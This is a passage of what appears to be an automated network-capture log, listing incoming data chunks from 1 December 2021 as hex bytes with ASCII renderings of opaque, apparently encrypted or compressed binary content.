b7 21 0f 53 35 af fe cf e7 a6 c1 ed 71 30 ad cb f3 aa 85 63 7d ef 02 5b 13 7e 60 8e 23 be b2 47 27 79 d6 71 e0 74 f3 48 29 d9 fa a1 9a bf e5 65 9b 4c 3a ed dc ac 5e 19 8b dc b8 ac 37 9b cf 89 6e 2a 13 ff 9f 67 79 Data Ascii: C!#M(lljU" ';?(a@(Ht@(a@CV&ngUZ0~t~D;wGn~x}!gnr-/Z;7V#EDzo`G%PrN_gQB_h=h v!S5q0c}[~`#G'yqtH)eL:^7ngy
2021-12-01 18:26:22 UTC	240	IN	Data Raw: b7 80 e2 42 9e ff 9f 79 e5 74 2f 51 86 1a 0f 6b e7 4f 0f b1 c1 79 7a fb 97 05 3a a3 34 a1 8a 5a 0a 00 30 16 13 ec 95 0b ea 3a e1 50 ef 43 58 ea cf 35 a4 37 54 22 34 df 13 a8 4f 98 c2 d6 f6 89 28 65 2e 15 f9 5e 9b b9 9e 4d 41 31 87 11 17 ed 50 33 d7 24 ab d1 54 be ac 1e 11 16 38 0c 85 49 78 f6 19 2c 29 5c 99 3f 05 c8 c1 8b b4 c8 7b 0e 6b 9b fd a1 a9 93 97 a6 41 54 c3 ef 54 7a fd cd db 9d e4 82 45 a3 d1 05 65 41 f1 68 6e 36 ae 95 77 83 73 84 4a 81 20 31 90 e1 e1 d6 4c 47 91 02 d8 77 3f b3 f1 d3 3d 86 3e 91 6b 0a b3 86 f9 cd 88 99 16 5c 78 6f 34 ed 9e ab db 75 66 24 d2 7c e3 5c 44 01 fb cb 2c 63 ef fa 43 2b f4 47 ea 7f c8 37 14 69 a0 fa 28 b0 58 89 31 db fa ed 75 cb 1e 25 e3 df a6 f2 a0 cd b4 66 dc 0b fa 33 96 4c 03 6a bf a3 ce ed 03 7d 9e 7f 32 88 c3 2c 81 Data Ascii: Byt/QkOyz:4Z0:PCX57T"4O(e.^MA1P3$T8Ix,)\?{kATTzEeAhn6wsJ 1LGw?=>k\xo4uf$\|\D,cC+G7i(X1u%f3Lj}2,
2021-12-01 18:26:22 UTC	242	IN	Data Raw: 58 f2 5d b8 9b dc c0 64 7d 77 60 02 3d 57 61 c1 fa b1 90 60 c7 37 75 37 5c 55 33 25 f9 5e e3 c5 63 c5 9a 23 63 a5 80 3a 04 f8 68 ea e4 de 19 10 26 6c fc 8f 4b 6b e2 af 5f 54 df 71 8a b9 fb a8 1b 01 6c 27 19 b5 ef 0f a9 45 0f 11 1d 52 c1 28 66 a6 9d e0 1b 81 f7 5e 98 38 41 e0 e2 ea e4 65 4a ba 7c b7 2d df 53 68 d6 33 7a a2 03 ea 91 ce b8 ad c0 91 dd f2 40 8b b1 d1 2f 2a 94 59 2d e0 1f bf ec 62 e6 3a f2 f3 79 1c 6e e3 28 fa 1c 11 c8 6f 9e 48 49 e8 e2 58 91 4f 1d 8b 57 48 25 68 27 c0 77 04 2a 43 d0 4a 63 85 62 a2 62 b4 56 df b5 1b 8b f9 7c 1d 7d 66 ca 3b a3 18 61 6f 23 81 bf be 0e ff c2 45 e7 04 99 d5 3b 09 12 e6 a9 c7 b3 0a e2 e3 a9 0c 79 cd 25 e6 27 5f 2a 1a f1 c9 28 b1 61 81 57 38 d7 74 75 98 77 75 75 8c 75 cd 93 c5 e3 41 ef b4 b4 26 7e 1f e9 9c 6f aa 9b Data Ascii: X]d}w`=Wa`7u7\U3%^c#c:h&lKk_Tql'ER(f^8AeJ\|-Sh3z@/Y-b:yn(oHIXOWH%h'wCJcbbV\|}f;ao#E;y%'_*(aW8tuwuuuA&~o
2021-12-01 18:26:22 UTC	243	IN	Data Raw: 28 bc 7c c4 da 19 0b 31 27 85 7d f0 d0 6d 6b a2 84 28 4c 13 cf eb 21 95 3a 12 50 a4 10 35 49 06 5e 1c 57 41 dc 27 47 19 89 89 40 15 7d 3f 4f 10 98 0a c4 a8 eb 85 09 72 93 76 fb ad 97 16 91 5a fb 78 32 3f 5f 5a a5 1e 21 91 3f 2e 77 3f 68 82 87 72 44 53 41 14 23 38 4a 94 26 a3 4c 64 5b be 93 61 7b 6a 74 e8 3a 66 da 6b 93 ad 41 53 9f 57 b6 85 86 89 c5 c8 b6 32 ea d5 3d d7 58 ac 5a 44 21 20 e3 f9 2d 90 24 d1 eb 51 cd 1c 29 08 22 25 09 2f 49 76 8a 49 cd ee da e1 2f a9 8f bc c0 88 62 10 96 46 e1 51 da 46 86 8e c3 c8 86 8f 81 76 16 8f ff b3 ca e1 34 36 d0 c3 fe e1 e4 22 de 27 94 b5 7b 50 a1 9e 9a 0a c6 67 36 3e f7 ac df cf 8f b9 30 04 55 3e 38 30 63 13 0c 95 4f 76 0f 25 e3 b0 a3 f6 f4 a6 a5 4a 74 a4 a3 c8 86 84 ea ed 01 56 a9 b3 c6 7d 46 d1 12 b0 81 9f 58 93 8c Data Ascii: (\|1'}mk(L!:P5I^WA'G@}?OrvZx2?_Z!?.w?hrDSA#8J&Ld[a{jt:fkASW2=XZD! -$Q)"%/IvI/bFQFv46"'{Pg6>0U>80cOv%JtV}FX
2021-12-01 18:26:22 UTC	244	IN	Data Raw: 7f d2 24 bf 8c e2 17 1d 9e ea 98 4b ad 10 08 9f d8 51 e3 ca 4b 08 91 01 7f 2a 13 74 70 6b 48 40 e9 4a 0a 5e 1d 10 58 5c 05 7b 9c 24 e5 2f 1a f6 3b f2 0c c7 0b 93 27 8c 8f 13 6d 66 c3 6e d9 e9 9a a3 58 93 68 94 0e cb 39 5f 0f b6 1f 29 2f 2a 43 d0 55 6d 85 62 4b a7 06 37 fa 6c e2 f9 83 c7 e9 80 99 9c 3b 21 63 d5 6e c9 50 48 5b f0 85 fd 61 29 ff ff b3 3d a6 60 33 80 74 bc 1d b8 7d d3 27 d5 bf 97 4a 27 57 d9 1b f1 cf e0 e5 77 93 93 97 c0 a1 f3 96 88 1d 97 dc 5c 3b 4e 39 91 f3 69 5e 51 f5 d7 b0 51 2a c0 a8 8c 36 53 56 9b 16 bb 21 ff e6 4b c3 40 9e 58 70 10 ba c2 5f 9a 0c b2 d6 23 61 a2 86 e8 77 36 10 fb ee b6 73 38 b7 72 2b 1d 03 bf f5 6e b2 83 88 b8 0a b7 60 9d 91 b7 16 5b 97 f2 9c 82 3b f1 de 44 7b 33 c8 33 b2 f0 6d 23 be 43 c6 d7 87 96 54 6d 0d db c2 46 cf Data Ascii: $KQKtpkH@J^X\{$/;'mfnXh9_)/CUmbK7l;!cnPH[a)=`3t}'J'Ww\;N9i^QQ*6SV!K@Xp_#aw6s8r+n`[;D{33m#CTmF
2021-12-01 18:26:22 UTC	245	IN	Data Raw: 5e 23 50 c0 d9 ce cb ef 46 80 31 59 2c cc 7d 35 bb b4 d8 51 71 4c e0 52 72 d7 52 31 81 30 e1 e0 bc f8 e6 81 f0 3a a5 17 81 27 46 42 bd e7 c7 2d fa 95 45 13 a6 9f 25 1a 89 10 95 a7 fd 5c cf a3 04 8f 97 72 06 ba 6f 94 d9 ea e3 ae e2 02 1d 2c 38 93 d6 ed da 89 c6 0c 7a 1c 31 91 b3 33 f7 0c e9 67 38 75 d2 62 83 6a 35 20 de d5 c2 18 49 59 fd 75 ec 60 0f fa 20 18 2e 24 99 05 40 38 61 6c 09 c8 d6 ee f3 46 33 67 81 28 bb 2f 28 e8 b4 7d 8e e4 49 0c 40 1b 55 5d bf ab 19 3f 41 8a 5b 57 42 71 cf 28 a4 11 50 77 89 07 62 66 80 a4 99 20 fe ef 5f 19 f0 1d 13 74 af da 27 17 15 10 fc 56 4a 91 f6 63 68 7b 48 24 fa e3 50 ee 04 22 43 f7 c9 16 2a 40 fe 8b a9 5e f2 64 c6 e6 3c 7a 79 23 4d fd 8b ce 7d 43 3f 55 f1 55 31 13 69 a8 77 53 04 89 2f 51 6d 38 7a 30 7a 05 0b e9 5c de 9f Data Ascii: ^#PF1Y,}5QqLRrR10:'FB-E%\ro,8z13g8ubj5 IYu` .$@8alF3g(/(}I@U]?A[WBq(Pwbf _t'VJch{H$P"C*@^d<zy#M}C?UU1iwS/Qm8z0z\
2021-12-01 18:26:22 UTC	247	IN	Data Raw: d0 d5 4e c1 24 a4 d2 69 bc ee c4 fc 80 99 41 26 3d 93 c7 78 6a f5 32 00 83 37 f2 b4 37 86 98 a7 c3 f6 ed dc 0c d0 ab 0a 3c 0f a9 7e 6c b0 38 97 82 d0 d3 74 f1 bc 9a 29 d9 c8 2d c7 a5 ba e4 80 4b 61 a9 1b 81 3b 9f 19 86 8f ff a2 ad bf cc 14 51 0e 0a a9 8c 38 d2 9e 46 de 1a 89 9a c4 1c 6d ec a5 90 d4 51 ba 47 41 3d b7 2d ac 41 62 0d f4 f5 dc 21 5c d7 60 08 f8 8a 36 6a 55 0f f0 32 3f 1b b5 ed 63 c9 e6 48 d0 47 2b 6a ff 6f 6e a2 d9 aa 08 da ca ae 87 46 c4 cc 2e 85 df eb c3 0c bf 27 08 e3 79 d7 82 a6 0e b9 b0 d3 d6 f2 90 e1 38 bd 89 07 22 45 1b 5f 8f ed 28 ce 9a 18 2b 3a 5c c1 74 20 7d ef df 96 72 56 6b 19 84 72 cd 0a 92 cb cd 0e 44 86 c7 44 b4 26 19 1d a5 fd b6 a3 fc 08 37 09 4e 6d 0d 87 d3 10 bc 3b a3 40 3c e9 d1 a0 af 99 92 8c c4 a2 96 1b d6 2f 50 8a b5 5d Data Ascii: N$iA&=xj277<~l8t)-Ka;Q8FmQGA=-Ab!\`6jU2?cHG+jonF.'y8"E_(+:\t }rVkrDD&7Nm;@</P]
2021-12-01 18:26:22 UTC	247	IN	Data Raw: 68 63 d6 62 4e a3 ff 41 4e c5 e2 69 10 6c 22 c6 d5 2f 9b 1d 50 7e 51 8e 0c 4c 46 a3 61 ec 98 47 ad f8 c6 9e d8 8a a0 6f 46 17 ac 07 eb 91 15 7c 28 d0 46 8d f1 57 7f d4 d6 68 c1 25 e9 d0 79 69 ac 4c ff b7 82 a2 85 11 18 d9 e7 94 72 ec 92 36 19 e4 0c 40 95 26 d1 84 95 90 f6 85 4c dd 3e 21 2a ec 1c 6b 13 6f 8c 70 6e b9 53 e7 b8 56 1f c9 b2 f9 4b f4 fd 10 9a 34 94 a1 ac bf d1 36 50 80 1f e6 e5 f8 cf 3e 76 69 ad 4f 73 11 4a db 75 2b e6 e9 f0 56 a3 7e 28 74 9c 8e 0c 53 a9 a8 03 65 be 9c 68 1d 86 28 7a 55 8c 27 13 1a 38 39 80 2e 3b 91 81 86 a0 ae cb 7e b0 34 5c fe be 17 4f 69 91 7e 8b f3 30 72 2e ae 7f fb 1f cb 8e ef 05 26 ac 88 5f b2 1e 53 ca b5 e7 40 da 36 8e db 13 b2 af 97 49 4c 48 2f f6 33 4b 39 25 45 e6 8c e6 1f 3d 00 86 21 8a d4 29 79 98 3f cc e5 71 ed 0f Data Ascii: hcbNANil"/P~QLFaGoF\|(FWh%yiLr6@&L>!*kopnSVK46P>viOsJu+V~(tSeh(zU'89.;~4\Oi~0r.&_S@6ILH/3K9%E=!)y?q
2021-12-01 18:26:22 UTC	249	IN	Data Raw: f0 0d b4 d5 9c 8d 7d 14 79 c9 24 d7 9e 63 c0 93 ac 01 57 ef f3 2f 39 c1 d9 9d 1d 47 01 ce 41 70 d3 64 9d 20 20 d0 25 21 6f 7f ab f4 32 69 fb 45 78 8b 1a 7b 37 80 80 02 12 39 7a c5 f8 e5 bb 36 bb 07 d6 02 06 e7 28 f9 da b0 07 53 e0 eb 3e d6 a2 83 03 ef 41 78 00 4d 6a d9 b8 67 3f f9 dc 91 64 5c 05 59 f8 79 13 20 1b d0 2d cb 4b 69 ec 72 70 08 3e 8f 63 64 ec 62 05 7c 99 81 dd 29 aa d9 29 f8 2a 6e db f1 82 7d 5a b0 fc bc 51 d3 df fb 56 55 2c a7 91 ad 20 80 c0 8f 5a a7 83 fa 50 1f 16 3d 7f 64 0f 77 16 8f 33 28 b5 6e 6c 48 d8 ff a9 9a 02 95 d4 cc 58 1d 99 fe 0f a2 22 01 26 53 96 56 55 89 94 2e 6a b7 12 89 67 c9 92 cc e0 17 14 16 3a 54 c2 99 ab f1 6c a6 f4 24 f8 4a 9b 31 c8 76 8f 40 cd ea 38 44 cd 3f 06 d0 98 3b 82 60 95 a7 c5 4a 1c 09 74 31 fe d1 64 ba 31 4b 20 Data Ascii: }y$cW/9GApd %!o2iEx{79z6(S>AxMjg?d\Yy -Kirp>cdb\|))*n}ZQVU, ZP=dw3(nlHX"&SVU.jg:Tl$J1v@8D?;`Jt1d1K
2021-12-01 18:26:22 UTC	250	IN	Data Raw: f7 2c 8a 1e 19 d4 dc 03 fe 39 1d 69 03 9f 7d 20 c7 e3 f1 3b e9 2e 59 ce 9f a5 38 62 07 47 14 9c 01 26 43 15 8d 93 79 ac b3 14 b9 f6 85 7b 53 ce 91 81 95 33 fe a9 b3 75 4e 88 1b 20 ec f0 65 33 69 82 6c 1a 9a 87 d7 8f 1e 2a b5 34 c8 6c 93 b2 24 1f 33 a3 89 61 d4 20 dd 33 12 b1 73 66 13 34 c2 41 c0 e0 46 64 2e be 7e 7e 69 91 95 97 5b f4 b2 d7 e4 2b 11 8d 30 f0 fb b0 41 49 d9 d4 72 5b 36 95 6e b9 e5 e6 c5 05 18 5e 35 67 c7 97 09 4c 79 5e 9e 3f 33 59 d8 3a 35 b0 1f e7 45 6d f1 8d 7a da 77 90 a2 f9 96 8c 9f c9 ba 95 9f 58 a0 2b e7 7e b0 0d 2f c9 95 71 f9 80 96 c8 ae f0 b7 a4 b3 1b e3 66 c1 70 3f db 46 3f ba 25 41 03 c9 4e de 3f 59 f9 c0 f8 db 35 a6 f4 9a 66 8a ad f0 28 ca 68 7a 21 3c 16 09 bc 3b 90 5d 1b 16 a2 eb 01 5d 7a 30 cf d1 64 58 4e 6b 0d a4 6d 29 ca bc Data Ascii: ,9i} ;.Y8bG&Cy{S3uN e3il*4l$3a 3sf4AFd.~~i[+0AIr[6n^5gLy^?3Y:5EmzwX+~/qfp?F?%AN?Y5f(hz!<;]]z0dXNkm)
2021-12-01 18:26:22 UTC	251	IN	Data Raw: 09 f2 ca 1e 85 62 89 67 5e 20 e6 eb 66 8a 26 0e 7f c1 b1 17 15 85 be 9f e2 a1 f2 22 89 64 87 84 2d bf 75 ee cd 67 16 9e 12 55 52 04 0c c5 79 2b 28 d7 7b e1 b2 bc f8 73 19 d7 6e 80 88 96 0e cd 42 a0 e7 44 b0 a5 58 2f 8e 68 1f 6c e1 cf 1d c5 76 2d 74 0b 20 0c 13 90 ab 96 06 2c 53 1c 9c a0 b8 f5 1d 1f 9c 86 54 2a 73 b6 d3 1b e8 aa be c9 74 a3 74 17 54 74 3f 82 23 64 72 8a 10 43 d1 1a 71 61 59 c2 0f 97 bc 92 76 63 88 c7 33 2b 4c 2b ab 67 15 2c 52 a9 73 f2 61 1d cb c0 5a 68 cb 79 16 8a 24 86 f4 72 d0 ba 6c d2 a5 69 51 4b d9 4b 85 81 4a 38 6a 12 cf 4a 8c 80 61 48 54 18 76 0b e1 28 1e 2d 7c a4 b2 f1 cd 1f e0 b6 6d ae 7d d0 ae ea 1a 47 c4 6d 94 fc e9 43 1a 76 7d 2e 93 e2 ea 3a ec 88 9f 71 d6 4b af ab 36 46 f6 b8 ab 6f 5a 70 60 c1 29 83 97 75 f0 03 c8 ba 8c 6d 14 Data Ascii: bg^ f&"d-ugURy+({snBDX/hlv-t ,ST*sttTt?#drCqaYvc3+L+g,RsaZhy$rliQKKJ8jJaHTv(-\|m}GmCv}.:qK6FoZp`)um
2021-12-01 18:26:22 UTC	253	IN	Data Raw: 17 29 c8 58 c8 e2 4c 10 38 eb 88 43 cb 7e 65 79 65 28 07 f8 7d 7f 2e e1 ac a8 9a 70 28 24 18 dd 44 36 98 c8 43 35 f3 f0 21 33 25 b1 ca d6 b7 50 d2 3e fa d4 d9 cc 0d cb b0 70 ff a3 c9 93 3f 8b 10 97 73 cd 6d 09 a2 0d e5 e3 62 e9 5d b3 58 14 3b 1c 4c 44 0f b7 4f c2 4f 27 0f 9d 41 43 78 5e 9c 83 ca 15 f4 24 95 cd 49 e4 f2 e4 1b cb 66 c9 45 ae 1d 0c 90 20 dc 7b ea 0c 13 03 2b db 04 c0 75 86 96 8e 34 df 9a dc c0 0f 28 11 09 f9 84 95 56 09 36 48 1c 4b b4 ad c1 eb 00 8a 0a f4 cf 45 64 4c 4e 68 0d b9 fc 78 eb 62 1d cb 7f 4f be b3 d1 76 e6 bb af a4 65 e5 77 67 6f 06 5c 02 54 30 35 ad 31 fc 5e 19 13 f7 8f 1c 9b a6 51 f6 89 1d b6 27 a0 0f 2a 89 02 e5 f4 84 1a 7f 65 11 7b db 20 a4 63 0f 63 94 40 35 76 8c 63 62 6f 6e bd b5 db 71 ee 82 5a 33 de 40 cf 8b f5 0f 4a 1f 14 Data Ascii: )XL8C~eye(}.p($D6C5!3%P>p?smb]X;LDOO'ACx^$IfE {+u4(V6HKEdLNhxbOvewgo\T051^Q'*e{ cc@5vcbonqZ3@J
2021-12-01 18:26:22 UTC	254	IN	Data Raw: d9 3d 3a 77 50 07 6e de 4c c5 32 b9 a4 e2 7c 62 00 7e 12 05 d7 83 3c a6 bb a5 b3 77 53 c0 4e d0 1e 29 6e 33 37 a9 82 9f ef d7 87 bd bf 2b f6 a0 4c c8 64 4b 11 9d ba 2f 67 64 64 8f 83 e4 91 06 d6 a1 88 88 61 63 3e d3 7f 46 b4 05 51 ba 35 d7 db 4d fc df dd a3 60 21 b9 1e 6e 58 84 5e 2c dc 84 c0 b2 81 a4 10 5f 03 d4 03 b9 4b 20 93 7d 20 a4 78 f0 da 35 39 69 e7 d5 56 f0 a8 e3 ca 40 fc 25 fe 59 17 d6 97 b1 51 74 7b 56 aa 95 33 5d 2d 35 86 03 1f 93 12 8d 2a ba 13 78 18 e6 ba 6e 55 96 63 9d a7 a5 ca c8 54 d9 62 24 46 63 49 37 ee c2 a1 d9 2a 72 89 9f ab ef b0 e5 6f 29 1f 19 da bd d4 76 2d 15 1c 22 13 fb ff 65 38 a5 09 54 68 c1 92 77 c3 9e 65 ea f4 04 e4 1d c0 16 d8 11 90 68 ca 22 f5 0b cc ab f4 ad 34 e6 b3 89 71 13 49 ba b0 fa e9 61 de a4 64 b2 76 28 f6 4b ad cb Data Ascii: =:wPnL2\|b~<wSN)n37+LdK/gddac>FQ5M`!nX^,_K } x59iV@%YQt{V3]-5xnUcTb$FcI7ro)v-"e8Thweh"4qIadv(K
2021-12-01 18:26:22 UTC	255	IN	Data Raw: 46 03 89 5f f5 1f 62 be 20 66 ad 3c 95 55 88 85 6b c0 46 a5 5f 16 0a 6f 49 e3 c4 34 23 50 04 f0 f3 6e c7 e1 ce 17 55 b6 f1 6a 72 86 52 83 f7 2f 10 37 2f 56 86 96 9a 83 b4 94 30 46 f6 c9 2b 01 e3 c1 16 a0 62 10 7b a1 8f 2d e7 59 c5 08 4e 6d dc 02 30 2b b0 7f 40 b9 0d 3b 1e a5 36 de 01 d8 b2 1a a4 29 63 ed ff f3 a5 15 30 56 81 44 63 a9 48 5d ea 85 a3 72 1f af 09 04 08 0a 37 04 0e 2a 25 b0 5b 4c 00 f9 0a d7 4e 9c 9e 82 7f 5c a2 24 24 c9 8b 25 21 26 cd 85 c4 7d 4b cc 4f dc 5c f6 34 39 0e 70 76 f7 c4 f4 e0 22 1d a3 14 95 d3 ac 1c 91 84 20 ba 47 9f 3b 7a 40 15 69 3f 05 18 94 92 b2 e7 14 bd c1 c7 66 fd c3 20 3a 73 37 4c f7 24 40 8e f6 ff af 2d ee 86 44 62 94 29 3c f6 af 06 b3 f5 76 6a 3c b5 84 2d 47 06 e8 d8 e9 4d 48 eb de 76 50 a8 84 99 b9 4f 89 de f3 ea 99 49 Data Ascii: F_b f<UkF_oI4#PnUjrR/7/V0F+b{-YNm0+@;6)c0VDcH]r7*%[LN\$$%!&}KO\49pv" G;z@i?f :s7L$@-Db)<vj<-GMHvPOI
2021-12-01 18:26:22 UTC	256	IN	Data Raw: 71 5f 50 cc df 07 e4 3c 70 b8 c6 85 6f 86 f5 1d 65 b7 ec ba 49 b9 e2 26 9a b5 fc e2 b2 5f cd 1e 0b e2 ec db db 14 cd 08 38 ee 53 9d 58 cd 74 7c 1a 15 fa f0 6c 4d 9e 26 20 e3 0e 70 5d b8 c5 a7 37 95 f0 3a 01 6f 1d 7c 60 c1 fa 5f 3b e8 2e 46 dc 47 6d 6a b9 ef e3 4d 1e 46 10 7b 65 f1 78 c5 cb 6d 01 10 14 d3 d9 74 19 b9 75 ac 34 0b cf 60 e3 26 1e db f2 4f e5 47 30 aa 5b 2c db 28 5e 02 ef b7 01 87 e0 96 57 5e a2 97 92 9b a0 67 f5 47 83 6f d9 25 40 23 25 60 a1 7d f6 45 08 fb a3 72 51 c1 73 e8 74 9f 75 53 66 1b f1 ad 16 f0 94 0e a8 f4 92 fc 5b 1d 63 01 e6 df 1f 16 0d 34 e6 bf 32 78 7d f1 a4 7a 80 30 ec 19 fe 78 28 73 36 17 bb d1 bf 57 92 cd 5f 40 60 84 d4 c0 fd 62 d5 66 30 25 5f 22 c4 12 66 f8 85 03 70 20 7c 06 42 9e 8e ed 9c 77 42 56 2f 78 24 0b 32 00 85 2c 1e Data Ascii: q_P<poeI&_8SXt\|lM& p]7:o\|`_;.FGmjMF{exmtu4`&OG0[,(^W^gGo%@#%`}ErQstuSf[c42x}z0x(s6W_@`bf0%_"fp \|BwBV/x$2,
2021-12-01 18:26:22 UTC	258	IN	Data Raw: 5c 11 47 00 b6 b3 e2 67 19 b2 9f c3 6d ef 9d a5 a8 1d 44 a4 15 2c 0f 6d b2 a9 e2 18 d0 ee 6d 4a 20 fa e4 f7 89 20 ea df 60 71 61 db 89 81 a8 74 da 27 2e 43 11 61 c2 2e 9b 2b 64 55 be 2c 91 e7 63 c1 33 c5 7d 4f 91 f3 2a b4 bc 64 b4 28 81 9f d5 4f be 1e af 13 2e fc a1 74 e6 e2 a8 a2 a1 ce 64 68 c3 77 cd c4 28 6e c2 fb d5 e3 c5 1e a1 7b 84 f7 d2 fc c3 c2 67 ff c1 42 bd 74 cd 3c 67 16 5d 99 a7 78 c9 28 39 c1 38 35 e6 f8 8a e3 d8 1e 23 48 77 d8 ce cb a6 52 a4 d1 ae 2d 9b 26 96 de c5 59 e7 2f 7f f2 ba ba 14 e3 0c 6c 63 84 8c 36 3b 6f b5 13 39 d5 f7 0d 1b 02 7e e9 ef 5e 65 f9 18 19 1d 50 40 2b 8e e1 14 a1 41 d1 c2 03 d3 c5 80 14 02 94 8f 36 3f eb 28 f4 de ee 69 0d 99 b8 79 fe c9 70 90 ed 7b 7a 69 70 aa 71 00 be 3f 08 64 cf 2d d2 16 ff 59 dc 21 f0 69 40 f0 02 9c Data Ascii: \GgmD,mmJ `qat'.Ca.+dU,c3}O*d(O.tdhw(n{gBt<g]x(985#HwR-&Y/lc6;o9~^eP@+A6?(iyp{zipq?d-Y!i@
2021-12-01 18:26:22 UTC	259	IN	Data Raw: 14 d3 4a c0 2d 5e d6 54 bf b9 2e 0b d1 fb 1b e8 6a 66 ca a4 b1 b1 bb f2 91 50 b8 e3 8f f0 d4 08 fd 97 2e 93 d8 e3 84 8a 28 1d c5 ee a5 a9 fe 7b 6c 62 8f 69 d6 be 7e 22 63 f5 80 82 af 2d 64 0d e0 8b 61 02 d5 c5 45 ec 3a 13 27 b5 2d 44 be 8b 6e de 15 38 9e 58 d8 4b 18 c1 0e c7 f4 cf 2e 8c d5 21 e9 d0 1f 93 9d e5 00 86 3a f2 0c 09 d8 77 d6 28 71 ec 92 6a 90 91 cc a6 e8 92 58 9c 5f 77 8b 57 c5 a0 f0 ef 0d bf 40 1a 3d 08 f4 bd 7b 9d 21 f2 ab db 5a 08 e2 10 06 14 15 7f 66 ab 09 aa 7c 52 f6 51 b5 a4 95 65 16 6f 5f ae f9 6d 3f b1 82 98 c0 53 f2 3a 98 a9 b2 15 b7 6c 06 2f 52 86 46 70 cb 20 6c 65 41 89 6c 11 dc 68 f7 f9 50 37 9e dc ff 91 b6 f7 fc 2e 0c 9a 47 12 34 0e d9 f9 11 85 4d 33 b5 7d 57 56 53 e2 6a 32 a3 cd a9 53 cd f0 6b 50 ba f2 36 89 5f f4 48 ff 9d 16 43 Data Ascii: J-^T.jfP.({lbi~"c-daE:'-Dn8XK.!:w(qjX_wW@={!Zf\|RQeo_m?S:l/RFp leAlhP7.G4M3}WVSj2SkP6_HC
2021-12-01 18:26:22 UTC	260	IN	Data Raw: 5b a8 fd a1 2c 67 e3 a8 ca 21 cf 64 14 40 76 cd 50 aa 6f c2 5d 58 e2 c5 a6 2d 7a 84 3f 58 fd c3 20 fd fe c1 b2 76 75 cd c0 b2 17 5d 95 4a 79 c9 24 f4 c0 38 09 0d f9 8a bb 4c 1f 23 38 e6 d9 ce 4b 2c 53 a4 41 34 2c 9b 82 1e df c5 99 7f 2e 7f 20 36 bb 14 07 81 6d 63 6a 65 37 3b 7f 2f 12 39 f3 6b 0c 1b 44 f4 e8 ef 06 b1 c2 44 06 c3 3f 24 3e 4e 93 48 58 8f a3 b6 66 0f f7 b2 a2 c7 e6 ea 9a bc d8 06 46 02 83 69 cd 7a dc 0d 1d 10 1f f4 2a bc 08 21 83 75 1b 45 46 ce 09 64 bb 90 d9 16 99 c7 dd 55 aa b4 41 80 48 2c db 7a 5a 2e 0d 3b c1 7b 44 fe ba 67 f5 f8 1a 36 a6 a9 0f 86 9f f5 3f c6 bc 68 09 c3 86 5a d2 73 27 19 23 fe 29 44 a9 4e 19 53 be 8c c7 fb 05 f0 74 cf c5 8e 3a f1 23 09 a2 ed d0 d4 1f c6 d8 85 c8 59 0b db 37 ba b8 da 1c 5c 5a 04 aa f4 ce 05 af f6 cc c9 53 Data Ascii: [,g!d@vPo]X-z?X vu]Jy$8L#8K,SA4,. 6mcje7;/9kDD?$>NHXfFiz*!uEFdUAH,zZ.;{Dg6?hZs'#)DNSt:#Y7\ZS
2021-12-01 18:26:22 UTC	261	IN	Data Raw: 31 b9 38 74 a8 2e a8 a7 a1 5a d0 b4 21 9d d0 7a e0 e9 84 72 f2 3a f2 0c 6c fc 1e ed 28 01 ec f7 36 e2 91 ad c9 c8 e2 0b f9 30 19 ed 57 b1 a0 87 de 5e 88 1c 2a 76 38 86 8f 34 9d 51 a6 dd db 28 2d 83 74 26 14 46 7f 12 ca 0a c9 7a 37 fc 36 b8 cd a3 0e 36 02 5e c1 ee 1c 24 c2 98 ed 96 24 ce 43 83 e8 84 56 92 29 40 68 46 cf 4e 3b 89 0e 2b 65 32 89 07 6c 9b 28 a2 10 1b 77 fb 57 96 d1 96 d2 81 6e 6d 03 28 52 55 81 bc b9 5d 22 39 73 d6 97 0f 16 3f 57 51 72 f0 e3 e7 13 ac 30 04 10 df ca 0c c9 5f 3f 53 bf 9d 5d 25 b8 66 c9 69 2b f7 f7 00 c7 a9 82 fc 28 5a cd c7 6e 28 55 05 cd c6 48 f2 ce 0f a2 06 2a b7 f2 0c d7 f4 1d ea 12 e2 46 a5 cc d2 f0 73 62 ca c8 6a 5a 8e 6a 6b 05 6c db a9 46 cb b7 84 b3 d4 b6 0f 42 e8 23 31 04 1b 37 0b 49 2a ce 7f 55 b1 d2 8e 3f e7 df af 03 Data Ascii: 18t.Z!zr:l(60W^v84Q(-t&Fz766^$$CV)@hFN;+e2l(wWnm(RU]"9s?WQr0_?S]%fi+(Zn(UHFsbjZjklFB#17I*U?
2021-12-01 18:26:22 UTC	263	IN	Data Raw: ba 1f 63 4a 3a 73 3b 1e 02 66 39 92 40 50 1b 00 c9 8d ef 60 d2 99 18 04 aa 3d 40 25 39 bc 14 67 f6 bf c2 64 62 ad 80 90 b2 b5 8f ac 8f 8b 28 56 6e 8e 69 cd 29 b9 79 4a 79 22 90 2a cb 1d 69 98 1a 07 00 5f 8f 7b 64 de 9d 8f 16 d4 e9 b4 21 c9 d9 33 f0 27 2c a8 7a 35 2e 6b 3b b5 08 7d 92 88 04 e8 d8 07 5f a5 c7 0f e8 b7 87 29 a7 8c 05 66 e3 9c 28 c9 14 3c 77 19 8b 35 28 f1 6e 3a 20 be fe db 9a 1b 95 42 b9 cb e2 21 94 53 29 93 8c d3 a7 18 a9 8a e1 c7 2f 0b b7 36 df f0 bc 1d 33 6b 24 dd 9b b9 5a 93 99 ca a0 49 f0 cc 75 a9 b5 ee cd 44 63 2c 30 ea ea 13 1a 01 8b f1 85 f6 60 78 a3 ee 2c 4d cb 9c 21 19 31 fe 87 33 d0 5c 21 51 20 d6 25 57 52 3a 08 e5 b6 5a 38 4a 3f 11 cd e4 30 db 04 78 fd 46 1d ad d7 34 14 40 b3 da 32 28 f4 fb 18 23 96 9d 25 81 ee 74 ac a1 e1 d1 e9 Data Ascii: cJ:s;f9@P`=@%9gdb(Vni)yJy"*i_{d!3',z5.k;}_)f(<w5(n: B!S)/63k$ZIuDc,0`x,M!13\!Q %WR:Z8J?0xF4@2(#%t
